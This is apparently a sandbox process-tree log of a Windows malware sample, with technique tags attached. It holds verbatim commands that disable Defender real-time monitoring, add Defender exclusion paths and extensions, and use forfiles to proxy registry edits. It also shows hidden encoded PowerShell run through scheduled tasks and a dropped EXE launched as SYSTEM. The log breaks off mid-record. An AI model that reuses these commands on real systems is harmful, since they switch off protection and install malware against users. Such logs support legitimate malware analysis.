C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1728 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2788
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2260
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1660 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:812
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2188
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:2524 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1692
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:1360
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
PID:2060 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1880
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gonvAhOLb" /SC once /ST 02:09:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gonvAhOLb"3⤵
- System Location Discovery: System Language Discovery
PID:1848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gonvAhOLb"3⤵
- System Location Discovery: System Language Discovery
PID:2512
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1920 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:348
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geCuHCEnP" /SC once /ST 02:23:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geCuHCEnP"3⤵PID:2288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geCuHCEnP"3⤵
- System Location Discovery: System Language Discovery
PID:2416
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
- Indirect Command Execution
PID:2428 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:323⤵PID:1256
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:643⤵PID:2224
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:323⤵PID:2228
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:324⤵PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:643⤵PID:680
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\VLvKqTazivYGshTO\hPXXzVuo\UnZhnzDGBejjSizK.wsf"3⤵PID:1868
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\VLvKqTazivYGshTO\hPXXzVuo\UnZhnzDGBejjSizK.wsf"3⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1136 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:324⤵PID:2236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:324⤵PID:2576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:644⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:324⤵PID:2548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:644⤵PID:2184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:324⤵PID:2528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:644⤵PID:2188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:324⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:644⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:324⤵PID:2980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:324⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2580
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geinNyBHk" /SC once /ST 03:19:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geinNyBHk"3⤵PID:3020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geinNyBHk"3⤵PID:1896
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2288
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1336 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2932
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cszbzSIAjSjUwyOsr" /SC once /ST 02:14:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\MjytQiW.exe\" bH /sDpsdidAn 385121 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cszbzSIAjSjUwyOsr"3⤵
- System Location Discovery: System Language Discovery
PID:1676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 6283⤵
- Loads dropped DLL
- Program crash
PID:1956
-
-
-
C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\MjytQiW.exeC:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\MjytQiW.exe bH /sDpsdidAn 385121 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2300 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- System Location Discovery: System Language Discovery
PID:2276 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1696 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2576
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:2696
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:1120 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1916
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2608
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:684 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2336 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2548
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:2524 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2508
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2260
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
PID:2976 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2788
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:832
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bmbXFarNlpbNUcjZUs"3⤵PID:2168
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2560
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
- Indirect Command Execution
PID:1528 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
